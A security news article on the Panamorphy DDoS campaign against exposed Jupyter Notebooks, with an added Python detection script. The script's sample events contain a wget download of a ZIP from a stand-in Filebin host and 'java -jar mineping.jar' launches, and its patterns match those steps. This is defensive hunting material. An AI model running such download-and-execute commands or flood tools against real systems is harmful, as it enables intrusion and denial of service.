Cybersecurity researchers have published details of a new distributed denial of service (DDoS) attack campaign targeting misconfigured Jupyter Notebooks.
The operation has been codenamed Panamorphy by cloud security company Aqua. The attack leverages the Java-based tool mineping to launch a TCP flood DDoS attack. Mineping is a DDoS package designed for Minecraft game servers.
The attack chain involves exploiting an internet-facing Jupyter Notebook instance to execute a wget command to retrieve a ZIP archive hosted on a file-sharing site called Filebin.
The ZIP file contains two Java Archive (JAR) files, conn.jar and mineping.jar. The former is used to establish a connection to a Discord channel and trigger the execution of the mineping.jar package.
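Defenders can hunt for this chain in process-creation telemetry. The following is an added example, not code from Aqua or the original article: it flags a ZIP download from a Filebin host, or execution of conn.jar or mineping.jar, by any process descended from a Jupyter kernel. The JSON event format (pid/ppid/cmd) and the sample events are constructed assumptions.

```python
import json
import re
from urllib.parse import urlparse

# Constructed process-creation events (not from the Aqua report); the field
# names pid/ppid/cmd are an assumed, simplified EDR/auditd export format.
SAMPLE_EVENTS = """\
{"pid": 100, "ppid": 1, "cmd": "python -m jupyter notebook --ip=0.0.0.0"}
{"pid": 110, "ppid": 100, "cmd": "python -m ipykernel_launcher -f kernel-1.json"}
{"pid": 120, "ppid": 110, "cmd": "wget https://filebin.example/constructed/pack.zip"}
{"pid": 122, "ppid": 110, "cmd": "java -jar conn.jar"}
{"pid": 123, "ppid": 122, "cmd": "java -jar mineping.jar"}
{"pid": 200, "ppid": 1, "cmd": "wget https://mirror.example/updates.zip"}
{"pid": 210, "ppid": 110, "cmd": "pip install pandas"}
"""

JUPYTER = re.compile(r"\b(jupyter|ipykernel)", re.I)
JAR = re.compile(r"\bjava\b.*-jar\s+\S*\b(conn|mineping)\.jar\b", re.I)
URL = re.compile(r"https?://\S+")

def classify(cmd):
    """Return the attack-chain stage a command line matches, or None."""
    if re.match(r"\s*(wget|curl)\b", cmd):
        for url in URL.findall(cmd):
            parsed = urlparse(url)
            if "filebin" in (parsed.hostname or "") and parsed.path.lower().endswith(".zip"):
                return "zip-download-from-filebin"
    m = JAR.search(cmd)
    return f"jar-exec:{m.group(1).lower()}.jar" if m else None

def under_jupyter(pid, procs):
    """Walk the parent chain; True if any ancestor is a Jupyter process."""
    seen = set()
    while pid in procs and pid not in seen:  # 'seen' guards against pid loops
        seen.add(pid)
        pid = procs[pid]["ppid"]
        if pid in procs and JUPYTER.search(procs[pid]["cmd"]):
            return True
    return False

def detect(lines):
    """Return [(pid, stage)] for staged commands descended from Jupyter."""
    events = [json.loads(l) for l in lines.splitlines() if l.strip()]
    procs = {e["pid"]: e for e in events}
    hits = [(e["pid"], classify(e["cmd"])) for e in events]
    return [(p, s) for p, s in hits if s and under_jupyter(p, procs)]

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

The ancestry check is what keeps the rule quiet for the unrelated `wget` at pid 200 and for the ordinary `pip install` run from the notebook.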
“The attack aims to consume the resources of the targeted server by sending a large number of TCP connection requests,” Aqua researcher Assaf Morag said. “The results are then posted to a Discord channel.”
This attack campaign has been attributed to a threat actor known by the name yawixooo, who has a public repository on his GitHub account containing a Minecraft server properties file.
This is not the first time that internet-accessible Jupyter Notebooks have been targeted by attackers: in October 2023, a Tunisian threat called Qubitstrike was spotted infiltrating Jupyter Notebooks in an attempt to illegally mine cryptocurrency and infiltrate cloud environments.